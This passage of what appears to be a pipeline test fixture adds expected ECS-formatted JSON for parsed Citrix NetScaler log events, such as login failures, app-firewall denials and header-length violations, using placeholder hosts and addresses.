"country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SUBSCRIBER SESSION_EVENT 4471 0 : Session 12345", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SUBSCRIBER SESSION_FAILURE 4471 0 : Failure Reason: CredentialsInvalid", + "device_event_class_id": "SUBSCRIBER", + "extended": { + "message": "Failure Reason: CredentialsInvalid" + }, + "facility": "local0", + "host": "ns1", + "name": "SESSION_FAILURE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "failure_reason": "CredentialsInvalid" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SUBSCRIBER SESSION_FAILURE 4471 0 : Failure Reason: CredentialsInvalid", + "reason": "CredentialsInvalid", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + 
"preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAA LOGIN_FAILED 4471 0 : User john.doe - Client_ip 192.168.1.104 - Failure_reason \"Invalid password\" - Browser Chrome", + "device_event_class_id": "AAA", + "extended": { + "message": "User john.doe - Client_ip 192.168.1.104 - Failure_reason \"Invalid password\" - Browser Chrome" + }, + "facility": "local0", + "host": "ns1", + "name": "LOGIN_FAILED", + "priority": "info" + }, + "citrix_adc": { + "log": { + "browser": "Chrome", + "client_ip": "192.168.1.104", + "failure_reason": "Invalid password", + "user": "john.doe" + } + }, + "client": { + "ip": "192.168.1.104" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAA LOGIN_FAILED 4471 0 : User john.doe - Client_ip 192.168.1.104 - Failure_reason \"Invalid password\" - Browser Chrome", + "outcome": "failure", + "reason": "Invalid password", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.104" + ], + "user": [ + "john.doe" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "john.doe" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "Chrome" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAA EXTRACTED_GROUPS 4471 0 : Extracted_groups \"Engineering,Staff\"", + "device_event_class_id": "AAA", + "extended": { + "message": "Extracted_groups \"Engineering,Staff\"" + }, + "facility": "local0", + "host": "ns1", + "name": 
"EXTRACTED_GROUPS", + "priority": "info" + }, + "citrix_adc": { + "log": { + "groups": "Engineering,Staff" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAA EXTRACTED_GROUPS 4471 0 : Extracted_groups \"Engineering,Staff\"", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "Engineering,Staff" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_XMLPAYLOAD_CONTENT_TYPE_MISMATCH 4471 0 : XML Mismatched content-type in HTTP header detected = \"text/plain\".", + "device_event_class_id": "APPFW", + "extended": { + "message": "XML Mismatched content-type in HTTP header detected = \"text/plain\"." + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_XMLPAYLOAD_CONTENT_TYPE_MISMATCH", + "priority": "info" + }, + "citrix_adc": { + "log": { + "content_type_mismatch": "text/plain", + "message": "XML Mismatched content-type in HTTP header detected = \"text/plain\"." 
+ } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_XMLPAYLOAD_CONTENT_TYPE_MISMATCH 4471 0 : XML Mismatched content-type in HTTP header detected = \"text/plain\".", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_DENYURL 4471 0 : Disallow Deny URL for rule pattern = \"http://example.com/badpath\".", + "device_event_class_id": "APPFW", + "extended": { + "message": "Disallow Deny URL for rule pattern = \"http://example.com/badpath\"." 
+ }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_DENYURL", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Disallow Deny URL for rule pattern = \"http://example.com/badpath\".", + "url": "http://example.com/badpath" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_DENYURL 4471 0 : Disallow Deny URL for rule pattern = \"http://example.com/badpath\".", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "example.com", + "original": "http://example.com/badpath", + "path": "/badpath", + "scheme": "http" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_CONTENT_TYPE 4471 0 : Unknown content-type header value = \"application/unknown\".", + "device_event_class_id": "APPFW", + "extended": { + "message": "Unknown content-type header value = \"application/unknown\"." 
+ }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_CONTENT_TYPE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Unknown content-type header value = \"application/unknown\".", + "unknown_content_type": "application/unknown" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_CONTENT_TYPE 4471 0 : Unknown content-type header value = \"application/unknown\".", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_REFERER_HEADER 4471 0 : parsing referer header 'http://malicious.com' failed", + "device_event_class_id": "APPFW", + "extended": { + "message": "parsing referer header 'http://malicious.com' failed" + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_REFERER_HEADER", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "parsing referer header 'http://malicious.com' failed", + "referer_header": "http://malicious.com" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + 
"ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_REFERER_HEADER 4471 0 : parsing referer header 'http://malicious.com' failed", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "http": { + "request": { + "referrer": "http://malicious.com" + } + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_URL 4471 0 : URL length(2150) is greater than maximum allowed(2048).", + "device_event_class_id": "APPFW", + "extended": { + "message": "URL length(2150) is greater than maximum allowed(2048)." 
+ }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_BUFFEROVERFLOW_URL", + "priority": "info" + }, + "citrix_adc": { + "log": { + "max_allowed": { + "url_length": 2048 + }, + "message": "URL length(2150) is greater than maximum allowed(2048).", + "url_length": 2150 + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_URL 4471 0 : URL length(2150) is greater than maximum allowed(2048).", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_COOKIE 4471 0 : Cookie header length(1025) is greater than maximum allowed(1000).", + "device_event_class_id": "APPFW", + "extended": { + "message": "Cookie header length(1025) is greater than maximum allowed(1000)." + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_BUFFEROVERFLOW_COOKIE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "cookie_header_length": 1025, + "max_allowed": { + "cookie_header_length": 1000 + }, + "message": "Cookie header length(1025) is greater than maximum allowed(1000)." 
+ } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_COOKIE 4471 0 : Cookie header length(1025) is greater than maximum allowed(1000).", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_HDR 4471 0 : Header(Referer) length(550) is greater than maximum allowed(512).", + "device_event_class_id": "APPFW", + "extended": { + "message": "Header(Referer) length(550) is greater than maximum allowed(512)." + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_BUFFEROVERFLOW_HDR", + "priority": "info" + }, + "citrix_adc": { + "log": { + "header_length": 550, + "max_allowed": { + "header_length": 512 + }, + "message": "Header(Referer) length(550) is greater than maximum allowed(512)." 
+ } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_HDR 4471 0 : Header(Referer) length(550) is greater than maximum allowed(512).", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_QUERY 4471 0 : Query string length(1150) is greater than maximum allowed(1024).", + "device_event_class_id": "APPFW", + "extended": { + "message": "Query string length(1150) is greater than maximum allowed(1024)." 
+ }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_BUFFEROVERFLOW_QUERY", + "priority": "info" + }, + "citrix_adc": { + "log": { + "max_allowed": { + "query_string_length": 1024 + }, + "message": "Query string length(1150) is greater than maximum allowed(1024).", + "query_string_length": 1150 + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_QUERY 4471 0 : Query string length(1150) is greater than maximum allowed(1024).", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_TOTAL_HDR 4471 0 : Total HTTP header length(4600) is greater than maximum allowed(4096).", + "device_event_class_id": "APPFW", + "extended": { + "message": "Total HTTP header length(4600) is greater than maximum allowed(4096)." 
+ }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_BUFFEROVERFLOW_TOTAL_HDR", + "priority": "info" + }, + "citrix_adc": { + "log": { + "max_allowed": { + "total_http_header_length": 4096 + }, + "message": "Total HTTP header length(4600) is greater than maximum allowed(4096).", + "total_http_header_length": 4600 + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_TOTAL_HDR 4471 0 : Total HTTP header length(4600) is greater than maximum allowed(4096).", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_BIND_TO_PROFILE 4471 0 : Profile: UserAccount", + "device_event_class_id": "APPFW", + "extended": { + "message": "Profile: UserAccount" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_BIND_TO_PROFILE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Profile: UserAccount", + "profile": "UserAccount" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + 
"ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_BIND_TO_PROFILE 4471 0 : Profile: UserAccount", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_BIND_XML_TO_PROFILE 4471 0 : Profile: AdminSettings", + "device_event_class_id": "APPFW", + "extended": { + "message": "Profile: AdminSettings" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_BIND_XML_TO_PROFILE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Profile: AdminSettings", + "profile": "AdminSettings" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_BIND_XML_TO_PROFILE 4471 0 : Profile: AdminSettings", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : 
APPFW AF_ADD_FIELDTYPE 4471 0 : Field Type: String", + "device_event_class_id": "APPFW", + "extended": { + "message": "Field Type: String" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_ADD_FIELDTYPE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "field_type": "String", + "message": "Field Type: String" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_FIELDTYPE 4471 0 : Field Type: String", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_PROFILE 4471 0 : Profile: SecurityConfig", + "device_event_class_id": "APPFW", + "extended": { + "message": "Profile: SecurityConfig" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_ADD_PROFILE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Profile: SecurityConfig", + "profile": "SecurityConfig" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + 
"category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_PROFILE 4471 0 : Profile: SecurityConfig", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_FIELDTYPE 4471 0 : Field Type: Integer", + "device_event_class_id": "APPFW", + "extended": { + "message": "Field Type: Integer" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_RM_FIELDTYPE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "field_type": "Integer", + "message": "Field Type: Integer" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_FIELDTYPE 4471 0 : Field Type: Integer", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_PROFILE 4471 0 : Profile: NetworkPreferences", + "device_event_class_id": 
"APPFW", + "extended": { + "message": "Profile: NetworkPreferences" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_RM_PROFILE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Profile: NetworkPreferences", + "profile": "NetworkPreferences" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_PROFILE 4471 0 : Profile: NetworkPreferences", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_CFFIELD 4471 0 : Field Name: Username", + "device_event_class_id": "APPFW", + "extended": { + "message": "Field Name: Username" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_ADD_CFFIELD", + "priority": "info" + }, + "citrix_adc": { + "log": { + "field_name": "Username", + "message": "Field Name: Username" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 
14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_CFFIELD 4471 0 : Field Name: Username", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_CFFIELD 4471 0 : Field Name: Password", + "device_event_class_id": "APPFW", + "extended": { + "message": "Field Name: Password" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_RM_CFFIELD", + "priority": "info" + }, + "citrix_adc": { + "log": { + "field_name": "Password", + "message": "Field Name: Password" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_CFFIELD 4471 0 : Field Name: Password", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_MEMORY_ERR 4471 0 : Content length is too large(4294967296 Bytes). 
